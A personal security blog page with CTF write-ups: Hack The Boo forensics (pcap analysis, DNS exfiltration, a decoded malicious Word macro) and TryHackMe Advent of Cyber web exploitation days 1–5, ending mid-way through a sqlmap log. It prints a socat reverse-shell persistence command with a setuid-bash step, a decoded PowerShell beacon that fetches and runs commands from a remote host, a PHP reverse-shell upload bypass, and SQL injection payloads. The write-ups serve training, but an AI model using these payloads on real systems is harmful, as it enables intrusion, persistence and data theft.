security. code. parenting. learning. games.

Category: Tech

HTB – Hack The Boo Forensic Writeups

I had a bit of time to play with the latest Hack the Box CTF: Hack the Boo. It was mostly targeted at a beginner audience but still had interesting challenges. I mostly focused on the first three forensic challenges this time.

Wrong Spooky Season

I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong.” Now there is an internal breach in the Spooky Network and you need to find out what happened. Analyze the the network traffic and find how the scary ghosts got in and what they did

Challenge Introduction

The challenge provided a .pcab file. Opening up in Wireshark for inspection, we notice, that it mostly contains HTTP traffic.

Most of that traffic were just images, htlm, css & java script. The files can be pretty easily exported.

File -> Export Objects -> HTTP

Most of them were not suspicious. Three of them gave a hint of what had been happening though:


It looked like there was a command injection vulnerability.

We were able to find another requests to that file in the PCAP:

GET /e4d1c32a56ca15b3.jsp?cmd=socat%20TCP:
Screenshot: Wireshark with the mentioned request

It looked like the attacker had started a reverse shell and was listening to it. This gave us more to look for.

In the packets below we could see them issuing a few commands to get a lay of the land. Like checking the distro with uname -r, listing out that passwd file or searching for “GTFO Bins“.

Eventually we see them issuing:

echo 'socat TCP: EXEC:sh' > /root/.bashrc && echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev > /dev/null && chmod +s /bin/bash

Reversing and Base64 decoding (For example in CyberChef) ==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS gives us the flag:


Trick or Breach

Our company has been working on a secret project for almost a year. None knows about the subject, although rumor is that it is about an old Halloween legend where an old witch in the woods invented a potion to bring pumpkins to life, but in a more up-to-date approach. Unfortunately, we learned that malicious actors accessed our network in a massive cyber attack. Our security team found that the hack had occurred when a group of children came into the office’s security external room for trick or treat. One of the children was found to be a paid actor and managed to insert a USB into one of the security personnel’s computers, which allowed the hackers to gain access to the company’s systems. We only have a network capture during the time of the incident. Can you find out if they stole the secret project?

Challenge Introduction

As in the previous challenge we were provided with a .pcab file.

Looking at it in Wireshark it becomes clear, that there only was DNS traffic. A whole number of alphanumeric subdomains are queried.

Screenshot: Wireshark with the DNS Requests

This very much looks like data exfiltration via DNS.

with tshark -nr capture.pcap -Y "dns.flags.response == 0" we get a list of all domains DNS requests.

We could use pipes and command-line tools like cut to extract just the domains. I was lazy and did it in Sublime with multi line editing.

After that we had to remove the parts as well as the line breaks.

After that we had to decode it from hex, which I did in Cyberchef.

Screenshot: Cyberchef decoding the data from hex

Pieces of the output like /drawings/drawing1.xml or xl/worksheets/sheet1.xml suggest that this was an MS Exel file. So we downloaded and saved it as .xlsx file. Then it could be opened in an office program (In my case Libre Office) and we get to see the flag.

Screenshot of the exfiltrated document opened in libre office

Halloween Invitation

An email notification pops up. It’s from your theater group. Someone decided to throw a party. The invitation looks awesome, but there is something suspicious about this document. Maybe you should take a look before you rent your banana costume.

Challenge Introduction

This time we were presented with a .docm file. Opening it up in libre office we were presented with a warning about the macros being disabled for security reasons.

So we looked at the macros and found obfuscated code. The main block tried to build a command string that would run, but it’s parts were encoded.

Screenshot: Beginning of the macro in the macro editor of Libre Office

We now could extract the values and try to decode them in a tool like CyberChef. I went for a different route and copied the main part and the functions called within it and converted it into a python script that put out the decoded string.

from textwrap import wrap

def  uxdufnkjlialsyp(input):
    input = wrap(input, 2)
    output = ""
    for chars in input:
        output = output + chr(int(chars,16))
    return output

def  wdysllqkgsbzs(input):
    output = ""
    input = input.split(" ")
    for number in input:
        output = output + chr(int(number))
    return output

firstVar = ""
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") + uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") + uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") + uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") + uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") + uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") + uxdufnkjlialsyp("3130203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") + uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") + uxdufnkjlialsyp("38203635203835"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") + uxdufnkjlialsyp("203635203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") + uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") + uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") + uxdufnkjlialsyp("3635203731203831203635203738203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") + uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") + uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") + uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") + uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") + uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") + uxdufnkjlialsyp("37203635203732"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") + uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") + uxdufnkjlialsyp("37203635203930203831203636203637"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") + uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") + uxdufnkjlialsyp("203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") + uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") + uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") + uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") + uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") + uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3637") + uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") + uxdufnkjlialsyp("373120383520363520313031"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") + uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") + uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") + uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") + uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") + uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") + uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") + uxdufnkjlialsyp("203733"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") + uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") + uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") + uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") + uxdufnkjlialsyp("3635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") + uxdufnkjlialsyp("3831203635203733203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") + uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") + uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") + uxdufnkjlialsyp("20313033"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") + uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") + uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") + uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") + uxdufnkjlialsyp("203836203635203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") + uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") + uxdufnkjlialsyp("20313033203635203637203438"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") + uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313032") + uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") + uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") + uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") + uxdufnkjlialsyp("3635203631"))
result = firstVar

The numbers represented char codes. Decoding them again got us strings in char code representation. Running the script gave us a Base64 encoded string.


Decoding that gave us the command with each char separated by dots:

$.s.=.'.7.7…7.4…1.9.8…5.2.:.'.;.$.i.=.'.d.4.3.b.c.c.6.d.-.0.4.3.f.'.;.$.p.=.'.h.t.t.p.:././.'.;.$.v.=.I.n.v.o.k.e.-.R.e.s.t.M.e.t.h.o.d. .-.U.s.e.B.a.s.i.c.P.a.r.s.i.n.g. .-.U.r.i. .$.p.$.s./.d.4.3.b.c.c.6.d. .-.H.e.a.d.e.r.s. .@.{.".A.u.t.h.o.r.i.z.a.t.i.o.n.".=.$.i.}.;.w.h.i.l.e. .(.$.t.r.u.e.).{.$.c.=.(.I.n.v.o.k.e.-.R.e.s.t.M.e.t.h.o.d. .-.U.s.e.B.a.s.i.c.P.a.r.s.i.n.g. .-.U.r.i. .$.p.$.s./.0.4.3.f. .-.H.e.a.d.e.r.s. .@.{.".A.u.t.h.o.r.i.z.a.t.i.o.n.".=.$.i.}.).;.i.f. .(.$.c. .-.n.e. .'.N.o.n.e.'.). .{.$.r.=.i.e.x. .$.c. .-.E.r.r.o.r.A.c.t.i.o.n. .S.t.o.p. .-.E.r.r.o.r.V.a.r.i.a.b.l.e. .e.;.$.r.=.O.u.t.-.S.t.r.i.n.g. .-.I.n.p.u.t.O.b.j.e.c.t. .$.r.;.$.t.=.I.n.v.o.k.e.-.R.e.s.t.M.e.t.h.o.d. .-.U.r.i. .$.p.$.s./.7.e.a.2.3.a.2.c. .-.M.e.t.h.o.d. .P.O.S.T. .-.H.e.a.d.e.r.s. .@.{.".A.u.t.h.o.r.i.z.a.t.i.o.n.".=.$.i.}. .-.B.o.d.y. .(.[.S.y.s.t.e.m…T.e.x.t…E.n.c.o.d.i.n.g.].:.:.U.T.F.8…G.e.t.B.y.t.e.s.(.$.e.+.$.r.). .-.j.o.i.n. .'. .'.).}. .s.l.e.e.p. .0…8.}.H.T.B.{.5.u.p.3.r..3.4.5.y..m.4.c.r.0.5.}.

At the end you can already see the flag.

TryHackMe – Advent of Cyber 2 Day 1-6 – Web Exploitation [Writeup]

Advent of Cyber 2 is a free, holiday season themed room on TryHackMe all you need to get started is an account.

A new challenge is being released every day and I will update this blog post after I completed the next day.

Day 1 – A Christmas Crisis

Deploy the attack machine and the challenge by clicking the green buttons. Then open the browser of the attack box and enter the IP of the deployed challenge box.

Now create a user by typing in a username & password then clicking register. Now log in.

Toggle on the developer tools of the browser with ctrl-shift-i. And navigate to the data panel. Here you can see the cookie name and value.

Looking at the value you can either know by experience what kind of encoding is use. Or, if you have no idea you can pull up cyberchef, paste in the value and try out a few of the favorites.

Hint: the answer is the full name of the encoding, not just the three letter short handle.

For my username of foobar the cookie decodes to:

{"company":"The Best Festival Company", "username":"foobar"}

This is the JSON format. (Sorry, no idea to be less obvious about it.)

To get Santa’s cookie, we now need to change the username in the JSON to santa and encode that JSON into Hex again. You can do that in CyberChef as well. Make sure to select a delimiter of none.

Now we go back to the assembly line website and out developer tools. We replace the value of the auth cookie with what we just calculated, then reload the page.

Now we can turn on the assembly line again and when all switches are flipped on, the final flag is revealed.

Day 2 – The Elf Strikes Back!

As always we start with deploying both the attack box and the challenge server.

First we bring up the IP of the challenge in our browser. The website pretty much tells us what to do next. We add ?id=YOUR_ID_HERE to the url and replace YOUR_ID_HERE with the code provided the challenge description.

This leads us to the upload page.

Checking the file types in the upload dialog or the source code will reveal, that the website is accepting .jpeg, .jpg and .png file. Those all are common image formats.

The Walk-through / challenge asks us now to upload a reverse shell. The briefing even tells us what reverse shell.

But let us quickly talk about how we can find out what kind of reverse shell we should try. First we need to know what programming language is being run by the server. If we are lucky, like in this case, we get that information via the http header.

To view the header, we open up the developer tools again and head to the network tab. After a reload of the page, it should populate. We click on the main file, the one with our id, then select headers on the right panel. Scrolling through the headers we can find X-Powered-By: PHP/7.2.24

This tells us we are looking for a php reverse shell, just as suggested in the challenge.

As suggested in the guide, we copy the reverse sehll with cp /usr/share/webshells/php/php-reverse-shell.php . in the terminal to our working directory. Then we run subl php-reverse-shell.php to open the reverse shell code in sublime text.

Now we change line 49 and replace the placeholder with the IP of our attack box. We can find that IP right in the top of the try hackme page. We also change the port in line 50 to the suggested 4444. As long as we use a free, high number port we can choose whatever we like here, we just have to make sure to use the same port when setting up the listener in the next step.

After saving the file we switch back to the terminal and set up a netcat listener with sudo nc -lvnp 4444

Netcat is a tool that allows us to listen to and send network traffic. We need to run it with sudo (running it with root privileges) to make sure it has the permissions to open the port we specified.

Now we need to upload our reverse shell. But the websites does not accept .php file. We still need it to end in .php for the server to interpret the files as code and run it though.

That’s why we can try need to rename it to include one of the supported file types, for example let it end in .png.php

It uploads the file but we still have nothing on the terminal. We first have to get the server to execute out reverse shell. Sometimes you can get lucky and the uploaded file gets displayed right back to you. But this is not the case here.

So we need to find our reverse shell. It will be in some kind of upload directory on the server. We could use something like fuff and use a word list to find potential upload urls. But in this case, we can try and guess a few common ones. Like upload.

We can click our reverse shell there. The website probably will be stuck loading but we get back our shell in the terminal.

With /var/www/flag.txt we can display the final flag.

Day 3 – Christmas Chaos

This day very much follows the guide already outlined in the challenge, so I will keep this brief.

After starting the attack box and deploying the challenge, we first have a look at the website. It is a typical login form.

We launch burp suit, set the Firefox proxy to burp and set intercept in the burp proxy to on. We put in some test credentials and send them. Burp intercepts the request and we can have a look at it.

In the http history tab we can send the request to the burp intruder. In the positions tab in intruders we mark the positions. The two positions we need are the text data we had send.

Then we move to the payloads tab and enter the suggested word lists of the challenge. Switch between the two lists with the payload set drop down.

After clicking Start Attack and clicking away the community edition warning, we have a look at the results. There is only one that looks different.

We disable the intercept and try that set of credentials to log in. In that control panel we find the flag.

Day 4 – Santa’s Watching

After starting the attack box and deploying the challenge we can view the defaced site.

To solve the second question, read the documentation above, it should tell you how to construct the required command.

Now we try to find the API endpoint of the forum with gobuster. As suggested we use -w to specify the dirbuster big word list. We add the .php extension with -x. This is not needed to solve the challenge, it just put it in there because most forum software is written in php and so have been the previous challenges.

<code>gobuster dir -u -w /usr/share/wordlists/dirb/big.txt -x .php</code>

In gobuster’s output we find /api with a 301 http code, indicating it has permanently moved. We pull the url up in the browser.

It redirects to /api/ , a folder on the server. It looks like the API is only containing one endpoint, site-log.php

The challenge tells us that the parameter for the endpoint is date. Usually we would have to find that one out by either fuzzing or reading documentation if that is availible for the software running.

So we fuzz it with wfuzz:

wfuzz -c -z file,/opt/AoC-2020/Day-4/wordlist -u

In the output we see one of the results to have a different length. So we pull up the url with that parameter.

That will give us the flag and complete this day.

Day 5 – Someone stole Santa’s gift list!

First we pull of the site in the browser.

I very much recommend that you play around a bit with the SQL injection training site also hosted on port 3000 if you are new to SQL injections.

Next we are supposed to guess the panel name. Trying a few things will hopefully lead you eventually to santapanel

Now we can us an SQL injection to bypass the login page. We use santa as username and ' or true; -- as password. The ' end the string where the password is meant to be inerted. or true; adds another condition to the SQL statement. It now basically asks if the password matches or true. or true always leads to true so the comparisson with the password become irrelevant and we can log in with any existing user we specify. -- mark the rest of the original SQL querry as comment.

Our next task is to fins out how many entries the gift table has and what Paul wants. We can use the same payload ' or true; -- again. This time it does not invalidate the password, but the kids name. This way it puts out the gift for every kid. Now it just is a matter of counting and finding Pauls gift.

The screenshot is intentionally cropped to not reveal the answers. What we can see that the search terms are transmitted in the URL as GET parameter. This makes using a tool like SQL map rather easy. So instead of manually dumping the database to look for the flag and admin password, we use SQL map.

Firt we start up burp and switch the proxy in the browser to burp. Then we reload the panel with a default search, like shoes. We send the request in the burp proxy to the intruder, where we can save ti to disk. This allows us to use the cookie of our session ect. with SQLmap.

sqlmap -r gift --dump-all --tamper=space2comment

-r gift points sqlmap to the file saved from burp. I named mine gift but you might have chosen a different name.

--dump-all asks it to dump all data it can find

--tamper=space2comment is a simple WAF evasion technique something hinted at in the challenge. If you forget it, sqlmap will suggest it too though.

While it is running, sqlmap will prompt you for input. See the full dump below for details.

root@ip-10-10-172-235:~# sqlmap -r gift --dump-all --tamper=space2comment
 ___ ___[(]_____ ___ ___  {1.2.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:09:08

[02:09:08] [INFO] parsing HTTP request from 'gift'
[02:09:08] [INFO] loading tamper script 'space2comment'
[02:09:08] [INFO] testing connection to the target URL
[02:09:08] [INFO] testing if the target URL content is stable
[02:09:09] [INFO] target URL content is stable
[02:09:09] [INFO] testing if GET parameter 'search' is dynamic
[02:09:09] [INFO] confirming that GET parameter 'search' is dynamic
[02:09:09] [INFO] GET parameter 'search' is dynamic
[02:09:09] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable
[02:09:09] [INFO] testing for SQL injection on GET parameter 'search'
[02:09:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:09:09] [WARNING] reflective value(s) found and filtering out
[02:09:09] [INFO] GET parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="James")
[02:09:09] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[02:09:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[02:09:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:09:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL inline queries'
[02:09:28] [INFO] testing 'PostgreSQL inline queries'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[02:09:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:09:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
